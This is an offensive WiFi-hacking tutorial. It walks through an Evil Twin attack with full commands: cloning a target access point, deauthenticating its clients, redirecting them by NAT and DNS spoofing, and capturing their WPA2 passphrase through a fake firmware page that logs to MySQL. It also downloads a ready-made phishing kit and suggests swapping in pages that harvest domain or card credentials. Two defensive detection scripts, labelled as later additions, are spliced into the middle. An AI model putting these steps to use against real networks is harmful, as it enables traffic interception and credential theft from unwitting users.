In this article, I’ll show you how an attacker performs an Evil Twin attack with a fake access point to retrieve the cleartext WPA2 passphrase automatically.

I am using a sample web page for the demonstration.

An attacker can turn this webpage into basically any web app to steal information: domain credentials, social login passwords, credit card details, etc.

Evil Twin (noun): A fraudulent wireless access point masquerading as a legitimate AP.

The sole purpose of an Evil Twin attack is to eavesdrop on WiFi users and steal personal or corporate information without the user’s knowledge.

We will not be using any automated script; rather, we will understand the concept and perform it manually, so that you can write your own script to automate the task and make it simple and usable on low-end devices.

Let’s begin now!


Evil Twin Attack Methodology

Step 1: The attacker scans the air for the target access point’s information: SSID name, channel number and MAC address (BSSID).

He then uses that information to create an access point with the same characteristics, hence the name Evil Twin.

Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing them to connect to the fraudulent access point.

Step 3: As soon as the client is connected to the fake access point, s/he may start browsing the Internet.

Step 4: The client opens a browser window and sees a web administrator warning saying “Enter WPA password to download and upgrade the router firmware”.

Step 5: The moment the client enters the password, s/he is redirected to a loading page and the password is stored in the MySQL database on the attacker’s machine. The persistent storage and the active deauthentication are what make the Evil Twin attack automated.

An attacker can also abuse this automation by simply changing the webpage.

Imagine the same WPA2 password warning replaced by “Enter domain credentials to access network resources”. The fake AP stays up all the time, storing legitimate credentials in persistent storage.

I’ve discussed this in my Captive Portal Guide, where I demonstrate how an attacker can hack domain credentials without needing the user to open a webpage. Just connecting to the WiFi takes the user to our webpage automatically.

A WiFi user could be using Android, iOS, macOS or a Windows laptop; almost every device is susceptible to it.

But for now, I’ll show you how the attack works with fewer complications.

Prerequisites

Below is the list of hardware and software used in creating this article. Use any hardware of your choice as long as it supports the software you’ll be using.

Hardware used:

A Laptop (4GB RAM, Intel i5 processor)

Alfa AWUS036NH 1W wireless adapter

Huawei 3G WiFi dongle for Internet connection to the Kali Virtual Machine

Software Used

VMWare Workstation/Fusion 2019

Kali Linux 2019 (Attacker)

airmon-ng, airodump-ng, airbase-ng and aireplay-ng

dnsmasq

iptables

Apache, MySQL

Firefox web browser on Ubuntu 16.10 (Victim)

Installing required tools

So far we have the aircrack-ng suite of tools, Apache, MySQL and iptables pre-installed in our Kali Linux virtual machine.

We just need to install dnsmasq to allocate IP addresses to the client.

Install dnsmasq in Kali Linux

Type in terminal:

apt-get update
apt-get install dnsmasq -y

This will update the package cache and install the latest version of the DHCP server in your Kali Linux box.

Now all the required tools are installed. We need to configure Apache and the DHCP server so that the access point allocates an IP address to the client/victim and the client can reach our webpage.

Now we will define the IP range and the subnet mask for the DHCP server.

Configure dnsmasq

Create a configuration file for dnsmasq using vim or your favorite text editor and add the following lines.

sudo vi ~/Desktop/dnsmasq.conf

~/Desktop/dnsmasq.conf

interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Save and exit. Use whatever name you like for the .conf file.

Pro Tip: Replace at0 with wlan0 everywhere when hostapd is used for creating the access point.

Parameter Breakdown

dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP addresses will range from 10.0.0.10 to 10.0.0.250 and the default lease time is 12 hours.

dhcp-option=3,10.0.0.1: 3 is the DHCP option code for the default gateway, followed by the gateway’s IP, i.e. 10.0.0.1.

dhcp-option=6,10.0.0.1: 6 is the option code for the DNS server, followed by its IP address.

(Optional) Resolve the airmon-ng and NetworkManager conflict

Before enabling monitor mode on the wireless card, let’s fix the airmon-ng and NetworkManager conflict for good, so that we don’t need to kill NetworkManager or drop any network connection before putting the wireless adapter into monitor mode, as we used to do with airmon-ng check kill every time we started a WiFi pentest.

Open NetworkManager’s configuration file and add the MAC address of the device you want NetworkManager to stop managing:

vim /etc/NetworkManager/NetworkManager.conf

Now add the following at the end of the file (keyfile syntax: the option is unmanaged-devices, each entry is prefixed with mac: and entries are separated by semicolons):

[keyfile]
unmanaged-devices=mac:AA:BB:CC:DD:EE:FF;mac:A2:B2:C2:D2:E2:F2

Now that you have edited NetworkManager.conf you should have no more conflicts with airmon-ng in Kali Linux.

We are ready to begin now.

Put wireless adapter into monitor mode

Bring up the wireless interface

ifconfig wlan0 up

airmon-ng start wlan0

Putting the card into monitor mode shows output similar to the screenshot.

Now our card is in monitor mode without any issues with NetworkManager. You can start monitoring the air with the command:

airodump-ng wlan0mon

As soon as your target AP appears in the airodump-ng output window, press CTRL + C and note these three things (SSID, channel and BSSID) in a text editor:

vi info.txt

Set tx-power of the Alfa card to max: 1000 mW

tx-power stands for transmission power. By default it is set to 20 dBm (decibel-milliwatts) or 100 mW.

tx-power in mW increases 10 times with every 10 dBm. See a dBm to mW conversion table.

If your country was set to US during installation, then your card should operate at 30 dBm (1000 mW).

ifconfig wlan0mon down
iw reg set US
ifconfig wlan0mon up
iwconfig wlan0mon

If you are wondering why we need to change the region to operate our card at 1000 mW, here is why.

Different countries have different legal limits on the power and frequencies wireless devices may use. That is why Linux distributions have this information built in, and you need to change your region to allow yourself to operate at that frequency and power.

The motive for powering up the card is that when creating the hotspot you do not need to be near the victim: the victim’s device will automatically connect to the AP with the higher signal strength even if it isn’t physically nearer.

Start Evil Twin Attack

Begin the Evil Twin attack using airbase-ng:

airbase-ng -e "rootsh3ll" -c 1 wlan0mon

By default, airbase-ng creates a TAP interface (at0) as the wired side for bridging/routing the network traffic through the rogue access point. You can see it using the ifconfig at0 command.

For at0 to allocate IP addresses, we first need to assign an IP address to at0 itself.
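As an added defensive counterpart (not part of the original article), the check below flags exactly this situation from a scan listing: an AP advertising one of our ESSIDs from an unknown BSSID, or with weaker encryption than the legitimate one (the open clone airbase-ng creates here). The inventory, the CSV layout and the scan rows are constructed assumptions; only the ESSID and the target BSSID come from the article.

```python
"""Flag evil-twin candidates in an airodump-ng style scan listing (constructed sample data)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ApRecord:
    bssid: str
    channel: int
    privacy: str  # as airodump-ng prints in its ENC column: OPN, WPA2, ...
    essid: str


# Defender's inventory of legitimate APs (constructed; BSSID/ESSID taken from the article).
KNOWN_APS = {"rootsh3ll": {"bssid": "FC:DD:55:08:4F:C2", "privacy": "WPA2"}}


def parse_scan(lines):
    """Parse 'BSSID,channel,ENC,ESSID' rows; a simplified, constructed CSV layout."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, ch, privacy, essid = [f.strip() for f in line.split(",", 3)]
        records.append(ApRecord(bssid.upper(), int(ch), privacy.upper(), essid))
    return records


def find_evil_twins(records, known=KNOWN_APS):
    """Return (record, reason) for each AP impersonating a known ESSID."""
    findings = []
    for rec in records:
        ref = known.get(rec.essid)
        if ref is None:
            continue  # not one of our ESSIDs, out of scope for this check
        if rec.bssid != ref["bssid"].upper():
            findings.append((rec, "unknown BSSID advertising our ESSID"))
        elif rec.privacy != ref["privacy"].upper():
            findings.append((rec, f"encryption changed to {rec.privacy}"))
    return findings


# Constructed scan rows: the real AP, an open clone on the same channel, an unrelated network.
SAMPLE_SCAN = """
FC:DD:55:08:4F:C2, 1, WPA2, rootsh3ll
00:C0:CA:11:22:33, 1, OPN, rootsh3ll
0A:1B:2C:3D:4E:5F, 6, WPA2, neighbour-net
""".splitlines()

if __name__ == "__main__":
    for rec, why in find_evil_twins(parse_scan(SAMPLE_SCAN)):
        print(f"ALERT {rec.bssid} ch{rec.channel} {rec.privacy} '{rec.essid}': {why}")
```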

Allocate IP and Subnet Mask

ifconfig at0 10.0.0.1 up

Note: The Class A IP address 10.0.0.1 matches the dhcp-option parameter in the dnsmasq.conf file, which means at0 will act as the default gateway under dnsmasq.

Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it.

In other words, allowing the victim to access the Internet while we (the attacker) sniff that traffic.

For that, we will use the iptables utility to set firewall rules that route all traffic arriving on at0 through it.

You will get similar output if using VM

Enable NAT by setting Firewall rules in iptables

Enter the following commands to set up the NAT:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Make sure you enter the correct interface for --out-interface. eth0 here is the upstream interface through which we want to send out the packets coming from the at0 interface (rogue AP). The rest is fine.

After entering the above commands, if you are willing to provide Internet access to the victim, enable routing using the command below.

Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

Writing “1” to the ip_forward file tells the system to start forwarding traffic (if any) according to the rules defined in iptables; 0 disables forwarding, although the rules remain defined until the next reboot.

We will set it to 0 for this attack, as we are not providing Internet access before we get the WPA password.

We will now start the DHCP server so the fake AP can allocate IP addresses to the clients.

First, we need to tell the DHCP server the location of the file we created earlier, which defines the IP class, subnet mask and address range of the network.

Start the dnsmasq DHCP Listener

Type in terminal:

dnsmasq -C ~/Desktop/dnsmasq.conf -d

Here -C specifies the configuration file and -d keeps dnsmasq in the foreground (no-daemon mode) so its log output appears in the terminal.

As soon as the victim connects, you should see output similar to this in the dnsmasq terminal window:

[ dnsmasq ]

dnsmasq: started, version 2.76 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 192.168.74.2#53
dnsmasq: read /etc/hosts - 5 addresses
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250
dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone
dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e
dnsmasq-dhcp: 1673205542 tags: at0
dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f
dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router,
<-----------------------------------------SNIP----------------------------------------->
dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250

If you face any issue with the DHCP server, just kill the currently running DHCP processes:

killall dnsmasq dhcpd isc-dhcp-server

and run dnsmasq again. It should work now.

Start the Services

Now start Apache and MySQL (dnsmasq is already running from the previous step):

/etc/init.d/apache2 start
/etc/init.d/mysql start

We have our Evil Twin attack vector up and working. Now we need to put our fake webpage into action so that the victim sees it while browsing and enters the passphrase s/he uses for his/her access point.

Download Rogue AP Configuration Files

wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip

and then simply enter the following command in the terminal:

unzip Rogue_AP.zip -d /var/www/html/

This command extracts the contents of Rogue_AP.zip into Apache’s HTML directory, so that when the victim opens the browser s/he is automatically redirected to the default index.html webpage.

Now, to store the credentials the victim enters on the HTML page, we need a SQL database.

You will see a dbconnect.php file for that, but for it to work the database must already exist so that dbconnect.php can write to it.

Open terminal and type:

mysql -u root -p

Create a new user fakeap with password fakeap, since from MySQL version 5.7 onwards you cannot execute MySQL queries from PHP as the root user:

create user fakeap@localhost identified by 'fakeap';

Now create the database and table as defined in dbconnect.php:

create database rogue_AP;

use rogue_AP;

create table wpa_keys(password1 varchar(32), password2 varchar(32));

It should go like this:

Grant fakeap all the permissions on rogue_AP Database:

grant all privileges on rogue_AP.* to 'fakeap'@'localhost';

Exit and log in as the new user:

mysql -u fakeap -p

Select the rogue_AP database:

use rogue_AP;

Insert a test value into the table:

insert into wpa_keys(password1, password2) values ("testpass", "testpass");

select * from wpa_keys;

Note that both values are the same here, meaning the password and the confirmation password should match.

The Evil Twin attack is now ready; however, you’d need to wait for a client to connect and see the credentials coming in.

In some cases, your client might already be connected to the original AP. You need to disconnect the client forcibly using the aireplay-ng utility.

This is called a deauthentication attack. The attacker sends crafted packets carrying the BSSID of the access point, telling every client to de-authenticate. Connected clients honor the command and disconnect themselves.

The attack may also be targeted, by including the target’s MAC address with the additional -c parameter on the command line.

Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface>

aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon

--deauth 0: unlimited de-authentication requests. Limit the number of requests by entering a natural number.

We are using 0 so that every client disconnects from that specific BSSID and connects to our AP, as it has the same name as the real AP and is also an open access point.
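From the defender’s side, a `--deauth 0` flood like this is easy to spot: a burst of deauthentication frames carrying the AP’s BSSID as the source address. The detector below is an added example, not part of the article; it runs on a constructed list of frame metadata rather than a live capture, and the one-second window and the threshold are assumptions. Protected Management Frames (802.11w) are the mitigation, since clients then discard deauth frames that are not integrity-protected.

```python
"""Detect a deauthentication flood from 802.11 management-frame metadata (constructed sample)."""
from collections import deque

DEAUTH_SUBTYPE = 0x0C  # management frame subtype 12 = Deauthentication
BROADCAST = "FF:FF:FF:FF:FF:FF"


def parse_frames(lines):
    """Parse 'seconds,subtype_hex,src,dst' rows; a constructed layout, not a pcap."""
    frames = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        t, subtype, src, dst = [f.strip() for f in line.split(",")]
        frames.append((float(t), int(subtype, 16), src.upper(), dst.upper()))
    return frames


def deauth_flood_sources(frames, window_s=1.0, threshold=5):
    """Return source addresses that sent more than `threshold` deauths within window_s seconds."""
    recent = {}  # src -> timestamps of its deauths inside the sliding window
    flagged = set()
    for t, subtype, src, _dst in sorted(frames):
        if subtype != DEAUTH_SUBTYPE:
            continue
        q = recent.setdefault(src, deque())
        q.append(t)
        while t - q[0] > window_s:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged.add(src)
    return flagged


# Constructed capture: beacons (0x08), one legitimate deauth from another AP (not flagged),
# then a burst of broadcast deauths spoofing the target BSSID from the article.
SAMPLE_FRAMES = [
    "0.00,08,FC:DD:55:08:4F:C2,FF:FF:FF:FF:FF:FF",
    "0.10,08,0A:1B:2C:3D:4E:5F,FF:FF:FF:FF:FF:FF",
    "0.50,0C,0A:1B:2C:3D:4E:5F,2C:33:61:3D:C4:2E",
] + [f"{1.0 + i * 0.05:.2f},0C,FC:DD:55:08:4F:C2,{BROADCAST}" for i in range(8)]

if __name__ == "__main__":
    for bssid in deauth_flood_sources(parse_frames(SAMPLE_FRAMES)):
        print(f"ALERT deauth flood using BSSID {bssid}")
```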

As soon as a client connects to your AP, you will see activity in the airbase-ng terminal window like this.

Now, to simulate the client side, I am using an Ubuntu machine connected via WiFi and the Firefox web browser to illustrate the attack.

The victim can now access the Internet. You can do two things at this stage:

Sniff the client traffic
Redirect all the traffic to the fake AP page

and that’s what we want to do: redirect the client to our fake AP page.

Just run this command:

dnsspoof -i at0

It answers every DNS query seen on the at0 interface with our own address, so all HTTP traffic coming from at0 ends up at our page.

Not HTTPS traffic, though, because of the browsers’ built-in list of HSTS web sites: you can’t redirect HTTPS traffic without causing an SSL/TLS error on the victim’s machine.

When the victim tries to access any website (google.com in this case), s/he sees this page, which tells the victim to enter the password to download and upgrade the firmware.

Here I am entering “iamrootsh3ll” as the password that I (as the victim) believe is my AP’s password.

As soon as the victim presses [ENTER], s/he will see this.

Now, coming back to the attacker side, you need to check the MySQL database for the stored passwords.

Just type the previously used command (select * from wpa_keys;) in the MySQL terminal window and see whether a new entry is there.

After the simulation I checked the MySQL DB and here is the output.

And that’s how an attacker successfully executes an Evil Twin attack.

You now have the WPA2 passphrase in plaintext. You may close all the terminal windows and connect back to the real AP to check whether the password is correct, or whether the victim was a hacker himself/herself who tricked you!

An attacker doesn’t even need to perform an Evil Twin attack to grab a victim. He can also create a random free open WiFi (imagine a Starbucks) to attract victims onto his AP and start pentesting.